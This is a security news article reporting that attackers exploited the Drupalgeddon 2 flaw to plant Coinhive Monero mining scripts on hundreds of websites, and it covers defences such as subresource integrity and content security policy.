Blockchain & Cryptocurrency , Card Not Present Fraud , Endpoint Security

Cryptocurrency Miners Exploit Widespread Drupal Flaw

Researcher: 400 Sites or More Fall Victim to Massive, Forced Monero Mining Operation
Cryptocurrency Miners Exploit Widespread Drupal Flaw
The website for San Diego Zoo is one of hundreds that have fallen victim to monero miners via a Drupal flaw. (Source: Bad Packets Report)

A remote code execution vulnerability revealed in late March in the Drupal content management system is now being used on a large scale for mining virtual currency.

See Also: The Essential Guide to MITRE ATT&CK Round 4

The list of websites that have fallen victim to cryptocurrency hijacking attacks now numbers more than 400, with those affected including Lenovo, the India Olympic Association and the San Diego Zoo. Various U.S. government sites, including the National Labor Relations Board and the Office of Inspector General of the U.S. Equal Employment Opportunity Commission, have also been hit.

Those findings come from Troy Mursch, an independent security researcher with Bad Packets Report. He's compiled a list of the websites affected but says the true number is likely far higher.

"There's most definitely more," says Mursch, who published a blog post describing his findings on Saturday. "It's not an exhaustive list. Other sites will unfortunately be detected. At least at this point it's another reminder: Update your Drupal installations or this may happen to you."

Mursch says that as with other mass attacks online, notification is quite a challenge. He's started notifying governments and universities, but is hoping word will spread so other affected sites can be quickly remediated.

Monero Mining

The code planted on the infected websites "mines" the privacy-focused virtual currency monero. Mining is the process that virtual currencies use to verify transactions on a blockchain.

When users visit an infected website, their computer begins generating hashes as part of a pooled effort to complete a block for the blockchain. If a pool completes a block, monero gets doled out as a reward.

A sampling of sites infected with a monero miner. (Source: Bad Packets Report)

Although users who visited an affected site usually remain unaware that their system is being used for mining, it can have an effect on a computer if the mining software is configured to use a large percentage of computing power. Additionally, it wastes electricity. The mining ends, however, when someone closes the browser tab.

But virtual currency mining is probably the least harmful action that could result from the "highly critical" vulnerability, according to the Drupal SA-CORE-2018-002 security alert.

The remote code execution vulnerability, which affects Drupal 6, 7 and 8, could also be used by attackers to fully compromise a system. In fact, the vulnerability is so severe that its disclosure has been dubbed "Drupalgeddon 2." All Drupal administrators should upgrade immediately to Drupal 7 or 8 Core, according to the security alert.

Buzz Around Coinhive

Bad Packets Report's Mursch found the affected websites were loading a slightly modified version of the Monero mining script developed by Coinhive.

Coinhive was the subject of a recent in-depth report by cybersecurity blogger Brian Krebs. The mining code often turns up on hacked websites, although it had been positioned as an alternative method to advertisements for generating website revenue.

Coinhive takes a 30 percent share of mining rewards. Critics have called on the service to, at a minimum, not profit when the code is covertly slipped into websites without users' knowledge.

Infected website: the Office of Inspector General of the U.S. Equal Employment Opportunity Commission. (Source: Troy Mursch)

Scott Helme, a U.K.-based security expert, says that although Coinhive's terms of service prohibit sneaky mining, "there are absolutely no technical measures, whatsoever, in place to stop you from doing so.

If they wanted to stop their product being abused, which they claim they do because its malicious use is damaging their reputation, they could try to put some technical measures in place," Helme says in a Monday blog post.

In February, attackers managed to subvert an accessibility tool called Browsealoud. Coinhive was inserted into a JavaScript library within the tool.

At least 4,200 websites, including those run by the U.S., U.K. and Australian governments, unwittingly loaded the tainted Browsealoud tool, causing their customers' computer to begin mining Monero. The malicious code ran for about four hours before Browsealoud shut it down.

Anti-Mining Defenses

The good news is that there is now a variety of extensions that users can employ on the client side to detect and stop virtual currency mining (see Cryptojacking: Mitigating the Impact).

But the responsibility to truly stopping it relies on websites ensuring they're not infected in the first place.

There are two W3C standards that can help: subresource integrity, or SRI, and content security policy, or CSP. SRI allows for an integrity attribute to be added to a script tag. When a tampered script is loaded, its hash will be checked. If there's not a match, the browser won't load it.

CSP is a whitelisting tool. Admins can whitelist the approved resources and scripts, which would block a Coinhive script (see Cryptocurrency Miners: How to Shield Browsers From Bad Guys).

About the Author

Jeremy Kirk

Jeremy Kirk

Executive Editor, Security and Technology, ISMG

Kirk was executive editor for security and technology for Information Security Media Group. Reporting from Sydney, Australia, he created "The Ransomware Files" podcast, which tells the harrowing stories of IT pros who have fought back against ransomware.

Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing, you agree to our use of cookies.